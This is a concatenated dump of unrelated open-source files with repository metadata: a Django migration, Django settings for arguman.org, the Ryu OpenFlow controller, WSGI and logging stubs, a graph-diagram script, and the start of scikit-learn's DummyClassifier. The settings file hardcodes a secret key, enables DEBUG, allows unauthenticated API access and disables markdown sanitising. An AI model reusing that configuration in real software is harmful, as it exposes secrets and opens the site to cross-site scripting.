name='na_likert_quality',
),
migrations.AddField(
model_name='packagecomparison',
name='likert_quality_community',
field=models.IntegerField(blank=True, null=True, verbose_name='Which package has a better community for clients of the package?', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)]),
),
migrations.AddField(
model_name='packagecomparison',
name='likert_quality_documentation',
field=models.IntegerField(blank=True, null=True, verbose_name='Which package has better documentation?', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)]),
),
migrations.AddField(
model_name='packagecomparison',
name='na_likert_quality_community',
field=form.models.NotApplicableField(default=False, verbose_name="Don't know"),
),
migrations.AddField(
model_name='packagecomparison',
name='na_likert_quality_documentation',
field=form.models.NotApplicableField(default=False, verbose_name="Don't know"),
),
migrations.AlterField(
model_name='prequestionnaire',
name='professional_years',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='How many years of experience do you have programming professionally?', choices=[('Less than one year', 'Less than one year'), ('1-2 years', '1-2 years'), ('3-5 years', '3-5 years'), ('6-9 years', '6-9 years'), ('10-19 years', '10-19 years'), ('20 more more years', '20 more more years')]),
),
]
| {
"content_hash": "f770f18e79b0aff7f287b0efe82cb74a",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 377,
"avg_line_length": 43.93617021276596,
"alnum_prop": 0.6024213075060533,
"repo_name": "andrewhead/Search-Task-Logger",
"id": "ae1f815fc9bdb2d1e7f4ac1e95a30bb0b6fc090c",
"size": "2089",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "searchlogger/form/migrations/0017_auto_20160620_0023.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2993"
},
{
"name": "DIGITAL Command Language",
"bytes": "492"
},
{
"name": "HTML",
"bytes": "11766"
},
{
"name": "Python",
"bytes": "100170"
},
{
"name": "Shell",
"bytes": "212"
}
],
"symlink_target": ""
} |
"""
Django settings for arguman project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
from datetime import timedelta
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qlp_henm3k-$7u@9b(@coqgpd1-2xmtox%a8_#*r9=0wh5d0oo'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'social_auth',
'django_gravatar',
'rest_framework',
'rest_framework.authtoken',
'profiles',
'premises',
'newsfeed',
'blog',
'api'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'main.urls'
WSGI_APPLICATION = 'main.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'TR-tr'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(os.path.dirname(__file__), "../static"),
)
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(__file__), "../templates"),
)
# Social Auth Settings
AUTHENTICATION_BACKENDS = (
'social_auth.backends.twitter.TwitterBackend',
'django.contrib.auth.backends.ModelBackend',
)
AUTH_USER_MODEL = 'profiles.Profile'
# Rules
CONTENT_DELETION = {
'MAX_PREMISE_COUNT': 2,
'HAS_EMPTY_CONTENT_DELETION': True,
'LAST_DELETION_DATE': timedelta(hours=1)
}
TWITTER_CONSUMER_KEY = None # defined in settings_local.py
TWITTER_CONSUMER_SECRET = None # defined in settings_local.py
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
SOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'
SOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_associate_complete'
SOCIAL_AUTH_PIPELINE = (
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.associate.associate_by_email',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details',
)
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.AllowAny'
],
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
#'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
),
'PAGINATE_BY': 10,
'PAGINATE_BY_PARAM': 'page_size',
'MAX_PAGINATE_BY': 100,
'UNICODE_JSON': False,
'DATETIME_FORMAT': '%d-%m-%Y %H:%m'
}
MONGODB_HOST = "localhost"
MONGODB_DATABASE = "arguman"
SITE_URL = "arguman.org"
# Markitup Settings
MARKITUP_SET = 'markitup/sets/markdown'
MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': False})
BLOG_FEED_TITLE = "Arguman.org Blog'u"
BLOG_FEED_DESCRIPTION = "Arguman analizi platformu"
BLOG_URL = "http://arguman.org/blog"
try:
from settings_local import *
except ImportError:
print "settings_local.py not found!"
| {
"content_hash": "56e1e51d77e0fb2a1cc44f071782ed12",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 71,
"avg_line_length": 25.63736263736264,
"alnum_prop": 0.7023146163737677,
"repo_name": "omeripek/arguman.org",
"id": "4178be4138f48728a4a4e7a656b242ef2715fc90",
"size": "4666",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/main/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "35248"
},
{
"name": "HTML",
"bytes": "43925"
},
{
"name": "JavaScript",
"bytes": "19834"
},
{
"name": "Python",
"bytes": "141271"
}
],
"symlink_target": ""
} |
__all__ = ["models", "views", "helpers"] | {
"content_hash": "db0b2cf1a1dc850641bc4b0a3d7fbccc",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 40,
"avg_line_length": 40,
"alnum_prop": 0.525,
"repo_name": "jackjennings/RoboToDo",
"id": "a4b005de89f5b0c14e9c6f6cbaf9d5db8f563a03",
"size": "40",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "RoboToDo.roboFontExt/lib/todo/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "930"
},
{
"name": "Python",
"bytes": "15535"
}
],
"symlink_target": ""
} |
"""
The main component of OpenFlow controller.
- Handle connections from switches
- Generate and route events to appropriate entities like Ryu applications
"""
import contextlib
import logging
import random
from socket import IPPROTO_TCP
from socket import TCP_NODELAY
from socket import SHUT_WR
from socket import timeout as SocketTimeout
import ssl
import sys
from ryu import cfg
from ryu.lib import hub
from ryu.lib.hub import StreamServer
import ryu.base.app_manager
from ryu.ofproto import ofproto_common
from ryu.ofproto import ofproto_parser
from ryu.ofproto import ofproto_protocol
from ryu.ofproto import ofproto_v1_0
from ryu.ofproto import nx_match
from ryu.controller import ofp_event
from ryu.controller.handler import HANDSHAKE_DISPATCHER, DEAD_DISPATCHER
from ryu.lib.dpid import dpid_to_str
from ryu.lib import ip
LOG = logging.getLogger('ryu.controller.controller')
DEFAULT_OFP_HOST = '0.0.0.0'
DEFAULT_OFP_SW_CON_INTERVAL = 1
CONF = cfg.CONF
CONF.register_cli_opts([
cfg.StrOpt('ofp-listen-host', default=DEFAULT_OFP_HOST,
help='openflow listen host (default %s)' % DEFAULT_OFP_HOST),
cfg.IntOpt('ofp-tcp-listen-port', default=None,
help='openflow tcp listen port '
'(default: %d)' % ofproto_common.OFP_TCP_PORT),
cfg.IntOpt('ofp-ssl-listen-port', default=None,
help='openflow ssl listen port '
'(default: %d)' % ofproto_common.OFP_SSL_PORT),
cfg.StrOpt('ctl-privkey', default=None, help='controller private key'),
cfg.StrOpt('ctl-cert', default=None, help='controller certificate'),
cfg.StrOpt('ca-certs', default=None, help='CA certificates'),
cfg.StrOpt('ciphers', default=None, help='list of ciphers to enable'),
cfg.ListOpt('ofp-switch-address-list', item_type=str, default=[],
help='list of IP address and port pairs (default empty). '
'e.g., "127.0.0.1:6653,[::1]:6653"'),
cfg.IntOpt('ofp-switch-connect-interval',
default=DEFAULT_OFP_SW_CON_INTERVAL,
help='interval in seconds to connect to switches '
'(default %d)' % DEFAULT_OFP_SW_CON_INTERVAL),
])
CONF.register_opts([
cfg.FloatOpt('socket-timeout',
default=5.0,
help='Time, in seconds, to await completion of socket operations.'),
cfg.FloatOpt('echo-request-interval',
default=15.0,
help='Time, in seconds, between sending echo requests to a datapath.'),
cfg.IntOpt('maximum-unreplied-echo-requests',
default=0,
min=0,
help='Maximum number of unreplied echo requests before datapath is disconnected.')
])
def _split_addr(addr):
"""
Splits a str of IP address and port pair into (host, port).
Example::
>>> _split_addr('127.0.0.1:6653')
('127.0.0.1', 6653)
>>> _split_addr('[::1]:6653')
('::1', 6653)
Raises ValueError if invalid format.
:param addr: A pair of IP address and port.
:return: IP address and port
"""
e = ValueError('Invalid IP address and port pair: "%s"' % addr)
pair = addr.rsplit(':', 1)
if len(pair) != 2:
raise e
addr, port = pair
if addr.startswith('[') and addr.endswith(']'):
addr = addr.lstrip('[').rstrip(']')
if not ip.valid_ipv6(addr):
raise e
elif not ip.valid_ipv4(addr):
raise e
return addr, int(port, 0)
class OpenFlowController(object):
def __init__(self):
super(OpenFlowController, self).__init__()
if not CONF.ofp_tcp_listen_port and not CONF.ofp_ssl_listen_port:
self.ofp_tcp_listen_port = ofproto_common.OFP_TCP_PORT
self.ofp_ssl_listen_port = ofproto_common.OFP_SSL_PORT
# For the backward compatibility, we spawn a server loop
# listening on the old OpenFlow listen port 6633.
hub.spawn(self.server_loop,
ofproto_common.OFP_TCP_PORT_OLD,
ofproto_common.OFP_SSL_PORT_OLD)
else:
self.ofp_tcp_listen_port = CONF.ofp_tcp_listen_port
self.ofp_ssl_listen_port = CONF.ofp_ssl_listen_port
# Example:
# self._clients = {
# ('127.0.0.1', 6653): <instance of StreamClient>,
# }
self._clients = {}
# entry point
def __call__(self):
# LOG.debug('call')
for address in CONF.ofp_switch_address_list:
addr = tuple(_split_addr(address))
self.spawn_client_loop(addr)
self.server_loop(self.ofp_tcp_listen_port,
self.ofp_ssl_listen_port)
def spawn_client_loop(self, addr, interval=None):
interval = interval or CONF.ofp_switch_connect_interval
client = hub.StreamClient(addr)
hub.spawn(client.connect_loop, datapath_connection_factory, interval)
self._clients[addr] = client
def stop_client_loop(self, addr):
client = self._clients.get(addr, None)
if client is not None:
client.stop()
def server_loop(self, ofp_tcp_listen_port, ofp_ssl_listen_port):
if CONF.ctl_privkey is not None and CONF.ctl_cert is not None:
if not hasattr(ssl, 'SSLContext'):
# anything less than python 2.7.9 supports only TLSv1
# or less, thus we choose TLSv1
ssl_args = {'ssl_version': ssl.PROTOCOL_TLSv1}
elif sys.version_info >= (3, 7,):
# On Python3.7+ we can't wrap an SSLContext due to this bug:
# https://github.com/eventlet/eventlet/issues/526
# Lets assume the system has a new enough OpenSSL that
# SSL is fully disabled.
ssl_args = {'ssl_version': ssl.PROTOCOL_TLSv1}
else:
# from 2.7.9 and versions 3.4+ ssl context creation is
# supported. Protocol_TLS from 2.7.13 and from 3.5.3
# replaced SSLv23. Functionality is similar.
if hasattr(ssl, 'PROTOCOL_TLS'):
p = 'PROTOCOL_TLS'
else:
p = 'PROTOCOL_SSLv23'
ssl_args = {'ssl_ctx': ssl.SSLContext(getattr(ssl, p))}
# Restrict non-safe versions
ssl_args['ssl_ctx'].options |= ssl.OP_NO_SSLv3 | ssl.OP_NO_SSLv2
if CONF.ciphers is not None:
ssl_args['ciphers'] = CONF.ciphers
if CONF.ca_certs is not None:
server = StreamServer((CONF.ofp_listen_host,
ofp_ssl_listen_port),
datapath_connection_factory,
keyfile=CONF.ctl_privkey,
certfile=CONF.ctl_cert,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=CONF.ca_certs, **ssl_args)
else:
server = StreamServer((CONF.ofp_listen_host,
ofp_ssl_listen_port),
datapath_connection_factory,
keyfile=CONF.ctl_privkey,
certfile=CONF.ctl_cert, **ssl_args)
else:
server = StreamServer((CONF.ofp_listen_host,
ofp_tcp_listen_port),
datapath_connection_factory)
# LOG.debug('loop')
server.serve_forever()
def _deactivate(method):
def deactivate(self):
try:
method(self)
finally:
try:
self.socket.close()
except IOError:
pass
return deactivate
class Datapath(ofproto_protocol.ProtocolDesc):
"""
A class to describe an OpenFlow switch connected to this controller.
An instance has the following attributes.
.. tabularcolumns:: |l|L|
==================================== ======================================
Attribute Description
==================================== ======================================
id 64-bit OpenFlow Datapath ID.
Only available for
ryu.controller.handler.MAIN_DISPATCHER
phase.
ofproto A module which exports OpenFlow
definitions, mainly constants appeared
in the specification, for the
negotiated OpenFlow version. For
example, ryu.ofproto.ofproto_v1_0 for
OpenFlow 1.0.
ofproto_parser A module which exports OpenFlow wire
message encoder and decoder for the
negotiated OpenFlow version.
For example,
ryu.ofproto.ofproto_v1_0_parser
for OpenFlow 1.0.
ofproto_parser.OFPxxxx(datapath,...) A callable to prepare an OpenFlow
message for the given switch. It can
be sent with Datapath.send_msg later.
xxxx is a name of the message. For
example OFPFlowMod for flow-mod
message. Arguemnts depend on the
message.
set_xid(self, msg) Generate an OpenFlow XID and put it
in msg.xid.
send_msg(self, msg) Queue an OpenFlow message to send to
the corresponding switch. If msg.xid
is None, set_xid is automatically
called on the message before queueing.
send_packet_out deprecated
send_flow_mod deprecated
send_flow_del deprecated
send_delete_all_flows deprecated
send_barrier Queue an OpenFlow barrier message to
send to the switch.
send_nxt_set_flow_format deprecated
is_reserved_port deprecated
==================================== ======================================
"""
def __init__(self, socket, address):
super(Datapath, self).__init__()
self.socket = socket
self.socket.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
self.socket.settimeout(CONF.socket_timeout)
self.address = address
self.is_active = True
# The limit is arbitrary. We need to limit queue size to
# prevent it from eating memory up.
self.send_q = hub.Queue(16)
self._send_q_sem = hub.BoundedSemaphore(self.send_q.maxsize)
self.echo_request_interval = CONF.echo_request_interval
self.max_unreplied_echo_requests = CONF.maximum_unreplied_echo_requests
self.unreplied_echo_requests = []
self.xid = random.randint(0, self.ofproto.MAX_XID)
self.id = None # datapath_id is unknown yet
self._ports = None
self.flow_format = ofproto_v1_0.NXFF_OPENFLOW10
self.ofp_brick = ryu.base.app_manager.lookup_service_brick('ofp_event')
self.state = None # for pylint
self.set_state(HANDSHAKE_DISPATCHER)
def _close_write(self):
# Note: Close only further sends in order to wait for the switch to
# disconnect this connection.
try:
self.socket.shutdown(SHUT_WR)
except (EOFError, IOError):
pass
def close(self):
self.set_state(DEAD_DISPATCHER)
self._close_write()
def set_state(self, state):
if self.state == state:
return
self.state = state
ev = ofp_event.EventOFPStateChange(self)
ev.state = state
self.ofp_brick.send_event_to_observers(ev, state)
# Low level socket handling layer
@_deactivate
def _recv_loop(self):
buf = bytearray()
count = 0
min_read_len = remaining_read_len = ofproto_common.OFP_HEADER_SIZE
while self.state != DEAD_DISPATCHER:
try:
read_len = min_read_len
if remaining_read_len > min_read_len:
read_len = remaining_read_len
ret = self.socket.recv(read_len)
except SocketTimeout:
continue
except ssl.SSLError:
# eventlet throws SSLError (which is a subclass of IOError)
# on SSL socket read timeout; re-try the loop in this case.
continue
except (EOFError, IOError):
break
if not ret:
break
buf += ret
buf_len = len(buf)
while buf_len >= min_read_len:
(version, msg_type, msg_len, xid) = ofproto_parser.header(buf)
if msg_len < min_read_len:
# Someone isn't playing nicely; log it, and try something sane.
LOG.debug("Message with invalid length %s received from switch at address %s",
msg_len, self.address)
msg_len = min_read_len
if buf_len < msg_len:
remaining_read_len = (msg_len - buf_len)
break
msg = ofproto_parser.msg(
self, version, msg_type, msg_len, xid, buf[:msg_len])
# LOG.debug('queue msg %s cls %s', msg, msg.__class__)
if msg:
ev = ofp_event.ofp_msg_to_ev(msg)
self.ofp_brick.send_event_to_observers(ev, self.state)
def dispatchers(x):
return x.callers[ev.__class__].dispatchers
handlers = [handler for handler in
self.ofp_brick.get_handlers(ev) if
self.state in dispatchers(handler)]
for handler in handlers:
handler(ev)
buf = buf[msg_len:]
buf_len = len(buf)
remaining_read_len = min_read_len
# We need to schedule other greenlets. Otherwise, ryu
# can't accept new switches or handle the existing
# switches. The limit is arbitrary. We need the better
# approach in the future.
count += 1
if count > 2048:
count = 0
hub.sleep(0)
def _send_loop(self):
try:
while self.state != DEAD_DISPATCHER:
buf, close_socket = self.send_q.get()
self._send_q_sem.release()
self.socket.sendall(buf)
if close_socket:
break
except SocketTimeout:
LOG.debug("Socket timed out while sending data to switch at address %s",
self.address)
except IOError as ioe:
# Convert ioe.errno to a string, just in case it was somehow set to None.
errno = "%s" % ioe.errno
LOG.debug("Socket error while sending data to switch at address %s: [%s] %s",
self.address, errno, ioe.strerror)
finally:
q = self.send_q
# First, clear self.send_q to prevent new references.
self.send_q = None
# Now, drain the send_q, releasing the associated semaphore for each entry.
# This should release all threads waiting to acquire the semaphore.
try:
while q.get(block=False):
self._send_q_sem.release()
except hub.QueueEmpty:
pass
# Finally, disallow further sends.
self._close_write()
def send(self, buf, close_socket=False):
msg_enqueued = False
self._send_q_sem.acquire()
if self.send_q:
self.send_q.put((buf, close_socket))
msg_enqueued = True
else:
self._send_q_sem.release()
if not msg_enqueued:
LOG.debug('Datapath in process of terminating; send() to %s discarded.',
self.address)
return msg_enqueued
def set_xid(self, msg):
self.xid += 1
self.xid &= self.ofproto.MAX_XID
msg.set_xid(self.xid)
return self.xid
def send_msg(self, msg, close_socket=False):
assert isinstance(msg, self.ofproto_parser.MsgBase)
if msg.xid is None:
self.set_xid(msg)
msg.serialize()
# LOG.debug('send_msg %s', msg)
return self.send(msg.buf, close_socket=close_socket)
def _echo_request_loop(self):
if not self.max_unreplied_echo_requests:
return
while (self.send_q and
(len(self.unreplied_echo_requests) <= self.max_unreplied_echo_requests)):
echo_req = self.ofproto_parser.OFPEchoRequest(self)
self.unreplied_echo_requests.append(self.set_xid(echo_req))
self.send_msg(echo_req)
hub.sleep(self.echo_request_interval)
self.close()
def acknowledge_echo_reply(self, xid):
try:
self.unreplied_echo_requests.remove(xid)
except ValueError:
pass
def serve(self):
send_thr = hub.spawn(self._send_loop)
# send hello message immediately
hello = self.ofproto_parser.OFPHello(self)
self.send_msg(hello)
echo_thr = hub.spawn(self._echo_request_loop)
try:
self._recv_loop()
finally:
hub.kill(send_thr)
hub.kill(echo_thr)
hub.joinall([send_thr, echo_thr])
self.is_active = False
#
# Utility methods for convenience
#
def send_packet_out(self, buffer_id=0xffffffff, in_port=None,
actions=None, data=None):
if in_port is None:
in_port = self.ofproto.OFPP_NONE
packet_out = self.ofproto_parser.OFPPacketOut(
self, buffer_id, in_port, actions, data)
self.send_msg(packet_out)
def send_flow_mod(self, rule, cookie, command, idle_timeout, hard_timeout,
priority=None, buffer_id=0xffffffff,
out_port=None, flags=0, actions=None):
if priority is None:
priority = self.ofproto.OFP_DEFAULT_PRIORITY
if out_port is None:
out_port = self.ofproto.OFPP_NONE
flow_format = rule.flow_format()
assert (flow_format == ofproto_v1_0.NXFF_OPENFLOW10 or
flow_format == ofproto_v1_0.NXFF_NXM)
if self.flow_format < flow_format:
self.send_nxt_set_flow_format(flow_format)
if flow_format == ofproto_v1_0.NXFF_OPENFLOW10:
match_tuple = rule.match_tuple()
match = self.ofproto_parser.OFPMatch(*match_tuple)
flow_mod = self.ofproto_parser.OFPFlowMod(
self, match, cookie, command, idle_timeout, hard_timeout,
priority, buffer_id, out_port, flags, actions)
else:
flow_mod = self.ofproto_parser.NXTFlowMod(
self, cookie, command, idle_timeout, hard_timeout,
priority, buffer_id, out_port, flags, rule, actions)
self.send_msg(flow_mod)
def send_flow_del(self, rule, cookie, out_port=None):
self.send_flow_mod(rule=rule, cookie=cookie,
command=self.ofproto.OFPFC_DELETE,
idle_timeout=0, hard_timeout=0, priority=0,
out_port=out_port)
def send_delete_all_flows(self):
rule = nx_match.ClsRule()
self.send_flow_mod(
rule=rule, cookie=0, command=self.ofproto.OFPFC_DELETE,
idle_timeout=0, hard_timeout=0, priority=0, buffer_id=0,
out_port=self.ofproto.OFPP_NONE, flags=0, actions=None)
def send_barrier(self):
barrier_request = self.ofproto_parser.OFPBarrierRequest(self)
return self.send_msg(barrier_request)
def send_nxt_set_flow_format(self, flow_format):
assert (flow_format == ofproto_v1_0.NXFF_OPENFLOW10 or
flow_format == ofproto_v1_0.NXFF_NXM)
if self.flow_format == flow_format:
# Nothing to do
return
self.flow_format = flow_format
set_format = self.ofproto_parser.NXTSetFlowFormat(self, flow_format)
# FIXME: If NXT_SET_FLOW_FORMAT or NXFF_NXM is not supported by
# the switch then an error message will be received. It may be
# handled by setting self.flow_format to
# ofproto_v1_0.NXFF_OPENFLOW10 but currently isn't.
self.send_msg(set_format)
self.send_barrier()
def is_reserved_port(self, port_no):
return port_no > self.ofproto.OFPP_MAX
def datapath_connection_factory(socket, address):
LOG.debug('connected socket:%s address:%s', socket, address)
with contextlib.closing(Datapath(socket, address)) as datapath:
try:
datapath.serve()
except:
# Something went wrong.
# Especially malicious switch can send malformed packet,
# the parser raise exception.
# Can we do anything more graceful?
if datapath.id is None:
dpid_str = "%s" % datapath.id
else:
dpid_str = dpid_to_str(datapath.id)
LOG.error("Error in the datapath %s from %s", dpid_str, address)
raise
| {
"content_hash": "1dc608793c39be5ab30cb0d8d9420303",
"timestamp": "",
"source": "github",
"line_count": 557,
"max_line_length": 98,
"avg_line_length": 39.876122082585276,
"alnum_prop": 0.5354103822430327,
"repo_name": "osrg/ryu",
"id": "d79f290add05406f8f12aed94a9766b7afe756f7",
"size": "22900",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ryu/controller/controller.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "28540"
},
{
"name": "CSS",
"bytes": "306"
},
{
"name": "Erlang",
"bytes": "874721"
},
{
"name": "Gnuplot",
"bytes": "1094"
},
{
"name": "HTML",
"bytes": "306"
},
{
"name": "JavaScript",
"bytes": "8436"
},
{
"name": "Makefile",
"bytes": "88"
},
{
"name": "Python",
"bytes": "6137808"
},
{
"name": "Shell",
"bytes": "17573"
}
],
"symlink_target": ""
} |
"""
WSGI config for m_explorer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "m_explorer.settings")
application = get_wsgi_application()
| {
"content_hash": "0a06a333e0d7b3517ed7e70d0dcad89c",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.8125,
"alnum_prop": 0.7682619647355163,
"repo_name": "marvel-explorer/marvel-explorer",
"id": "ecf89f030fca363d7cde5cc0826332f14aa2a61c",
"size": "397",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "m_explorer/m_explorer/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1713816"
}
],
"symlink_target": ""
} |
import os
import sys
from manager import CrawlGraphManager
from data import GRAPHS
SCRIPT_FOLDER = os.path.abspath(os.path.split(sys.argv[0])[0])
CHARTS_FOLDER = os.path.join(SCRIPT_FOLDER, 'diagrams')
def generate_filename(graph_name):
name = graph_name
name = name.replace(' ', '_')
name = name.lower()
name = '%s.png' % name
return name
def generate_graph_diagram(filename, title, graph):
print "generating png diagram for test '%s'..." % title
manager = CrawlGraphManager()
manager.add_site_list(graph)
manager.render(filename, label=title, use_urls=graph.use_urls)
def generate_diagrams():
for graph in GRAPHS:
generate_graph_diagram(filename=os.path.join(CHARTS_FOLDER, generate_filename(graph.name)),
title=graph.name,
graph=graph)
if __name__ == '__main__':
generate_diagrams()
| {
"content_hash": "d1947773ffd5948376e1df20e05559a0",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 99,
"avg_line_length": 19.638297872340427,
"alnum_prop": 0.6338028169014085,
"repo_name": "RajatGoyal/frontera",
"id": "17a64fb9b773f40db17a62bf44dd16cbce7e0c5e",
"size": "923",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "frontera/utils/graphs/generate_diagrams.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "210178"
}
],
"symlink_target": ""
} |
import logging
LOGGER = logging.getLogger("metric")
| {
"content_hash": "3e0d1942b9c618a80d7df41f89d313a8",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 36,
"avg_line_length": 17.666666666666668,
"alnum_prop": 0.7735849056603774,
"repo_name": "sloe/metric",
"id": "6fbe632d01ccdf82804f287ba30afab4d58562b0",
"size": "54",
"binary": false,
"copies": "1",
"ref": "refs/heads/metric",
"path": "models/4_logger.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "66779"
},
{
"name": "HTML",
"bytes": "41309"
},
{
"name": "JavaScript",
"bytes": "2355558"
},
{
"name": "Python",
"bytes": "353712"
},
{
"name": "Shell",
"bytes": "2977"
}
],
"symlink_target": ""
} |
from __future__ import division
import warnings
import numpy as np
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, RegressorMixin
from .utils import check_random_state
from .utils.validation import check_array
from .utils.validation import check_consistent_length
from .utils.random import random_choice_csc
from .utils.stats import _weighted_percentile
from .utils.multiclass import class_distribution
class DummyClassifier(BaseEstimator, ClassifierMixin):
"""
DummyClassifier is a classifier that makes predictions using simple rules.
This classifier is useful as a simple baseline to compare with other
(real) classifiers. Do not use it for real problems.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "stratified": generates predictions by respecting the training
set's class distribution.
* "most_frequent": always predicts the most frequent label in the
training set.
* "uniform": generates predictions uniformly at random.
* "constant": always predicts a constant label that is provided by
the user. This is useful for metrics that evaluate a non-majority
class
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use.
constant : int or str or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
Attributes
----------
classes_ : array or list of array of shape = [n_classes]
Class labels for each output.
n_classes_ : array or list of array of shape = [n_classes]
Number of label for each output.
class_prior_ : array or list of array of shape = [n_classes]
Probability of each class for each output.
n_outputs_ : int,
Number of outputs.
outputs_2d_ : bool,
True if the output at fit is 2d, else false.
`sparse_output_` : bool,
True if the array returned from predict is to be in sparse CSC format.
Is automatically set to True if the input y is passed in sparse format.
"""
def __init__(self, strategy="stratified", random_state=None,
constant=None):
self.strategy = strategy
self.random_state = random_state
self.constant = constant
def fit(self, X, y, sample_weight=None):
"""Fit the random classifier.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("most_frequent", "stratified", "uniform",
"constant"):
raise ValueError("Unknown strategy type.")
if self.strategy == "uniform" and sp.issparse(y):
y = y.toarray()
warnings.warn('A local copy of the target data has been converted '
'to a numpy array. Predicting on sparse target data '
'with the uniform strategy would not save memory '
'and would be slower.',
UserWarning)
self.sparse_output_ = sp.issparse(y)
if not self.sparse_output_:
y = np.atleast_1d(y)
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if self.strategy == "constant":
if self.constant is None:
raise ValueError("Constant target value has to be specified "
"when the constant strategy is used.")
else:
constant = np.reshape(np.atleast_1d(self.constant), (-1, 1))
if constant.shape[0] != self.n_outputs_:
raise ValueError("Constant target value should have "
"shape (%d, 1)." % self.n_outputs_)
(self.classes_,
self.n_classes_,
self.class_prior_) = class_distribution(y, sample_weight)
if (self.strategy == "constant" and
any(constant[k] not in self.classes_[k]
for k in range(self.n_outputs_))):
# Checking in case of constant strategy if the constant
# provided by the user is in y.
raise ValueError("The constant target value must be "
"present in training data")
if self.n_outputs_ == 1 and not self.output_2d_:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
self.class_prior_ = self.class_prior_[0]
return self
def predict(self, X):
"""
Perform classification on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
